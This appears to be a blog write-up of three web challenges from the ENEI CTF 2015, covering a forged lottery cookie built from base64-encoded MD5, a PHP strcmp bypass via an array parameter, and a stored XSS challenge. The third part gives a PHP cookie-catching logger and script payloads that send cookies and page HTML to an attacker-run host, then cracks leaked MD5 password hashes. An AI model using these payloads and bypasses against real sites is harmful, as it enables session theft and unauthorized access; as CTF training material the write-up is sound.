ENEI CTF 2015 - Writeups

Web

Posted by André on September 21, 2015

Web

1 - Endless Lottery

We found this web site http://enei-x.dei.uc.pt/webhack3/ that is claiming to offer a prize when someone rolls the right number, but it's all a scam. Can you break the system to win the prize?!

The page looks like this:

Welcome to our lottery.

By visiting our page form time to time you get a chance of winning 10.0000 jelly beans!


Winning ticket: 1337500001 your ticket: 1337810218

Better luck next time... :(

The cookie changes when the page is refreshed, using a new browser session. In this session, my cookie was lotinfo="706:MjlmMjI5OWNhNGIyNmZiZjQyYzIzZWU0N2M0MDExMjU=". The second part of lotinfo seems to be a base64 encoded string.

$ base64 -d
MjlmMjI5OWNhNGIyNmZiZjQyYzIzZWU0N2M0MDExMjU=
29f2299ca4b26fbf42c23ee47c401125

Now, we have some kind of hash, 32 digits long. It can be a message-digest hash. Let's try to encrypt the ticket using the MD5 algorithm.

$ md5
1337810218
29F2299CA4B26FBF42C23EE47C401125

Nice! Now, we know that cookie = random_ID:base64(md5(ticket)). Since our goal is to win the lottery, all we need to do is to change the session cookie, using the winning ticket.

$ md5
1337500001
D50796F06CB23BE1A80284F80EAC0C2D
$ base64
d50796f06cb23be1a80284f80eac0c2d
ZDUwNzk2ZjA2Y2IyM2JlMWE4MDI4NGY4MGVhYzBjMmQ=

lotinfo="706:ZDUwNzk2ZjA2Y2IyM2JlMWE4MDI4NGY4MGVhYzBjMmQ="

Ok you win! Flag: 2d0ad06ff8349797176aad77e10edde031ec8c82

2 - Plain Auth

A friend has a service online and he says that he will never get hacked with his new bullet proof authentication mechanism. Can you prove him wrong?
http://enei-x.dei.uc.pt/webhack2/index.php

This was the login page (it's not working since I'm not running PHP):

When we submit the form, a new message shows up:

Let's try to search for strcmp vulnerabilities. The strcmp (string $str1, string $str2) function returns 0 if $str1 and $str2 are equal. When we inject an array in the GET password parameter we can bypass this comparison: index.php?password[]

\o/ Flag: 421c88ff643a053d2abf6b56936093a8cc5d5630

3 - Webhack 3

By analyzing some hack attempts in our HTTP logs we found a few scripts and those led us to an admin interface from our friend hacker. Can you get us inside?
http://enei-x.dei.uc.pt/webhack3/

This was the login page (it's not working since i'm not running the backend):

When we try to login using a random username and password the following message appears:

"An admin will track you by your IP"
Interesting... Let's try to steal some cookies! We need to set up a page to catch the cookie. I'm going to use PHP:

<?php
$data = $_GET['data'];
$f = fopen("log.txt", "a");
fwrite($f, $data."\n");
fclose($f);
?>

Let's inject a script in the username: <script>document.location("http://my-php-host/catch.php?data=" + document.cookie);</script>

Suddenly, this hint pops up:

Let's try to get the document HTML: <script>document.location("http://my-php-host/catch.php?data=" + document.documentElement.innerHTML);</script>. It worked!

log.txt

<head></head><body><p>remember to set your cookie "token": 2272d26a38bc90570d633e7b3508c67a </p><table class="table"><thead><tr><th>IP Address</th><th>Username</th><th>Password</th></tr></thead><tbody><tr><td>192.168.2.10</td><td>Xiene1337</td><td>185de54b5a6fd960f48666edfa41e6c6</td></tr><tr><td>192.168.2.12</td><td>Xiene1337</td><td>707d14da58ce62c08bba543fa62fe638</td></tr><tr><td>192.168.2.12</td><td>Xiene1337</td><td>74dade10c776b5ab3caf8cedb06860fb</td></tr><tr><td>127.0.0.1</td><td>script>document.location("http://my-php-host/catch.php?data=" + document.documentElement.innerHTML);</script></td></tr></tbody></table></body>

This HTML code looks like this:

remember to set your cookie "token": 2272d26a38bc90570d633e7b3508c67a

IP AddressUsernamePassword
192.168.2.10Xiene1337185de54b5a6fd960f48666edfa41e6c6
192.168.2.12Xiene1337707d14da58ce62c08bba543fa62fe638
192.168.2.12Xiene133774dade10c776b5ab3caf8cedb06860fb

If we try to login using the username Xiene1337 and setting document.cookie="token=2272d26a38bc90570d633e7b3508c67a" a new message appears:

The passwords in the log table may be MD5 hashes. Let's try to find them in MD5 databases.

MD5 HashOriginal password
185de54b5a6fd960f48666edfa41e6c6ljbi
707d14da58ce62c08bba543fa62fe638ljbp
74dade10c776b5ab3caf8cedb06860fbljbl

These passwords were mistyped by Xiene1337, since they are very similar. To find the correct password, just look to your keyboard! The correct password is ljbo.

\o/ Flag: 7b88396a68feaa7aa3c388227d749097cfbf99fe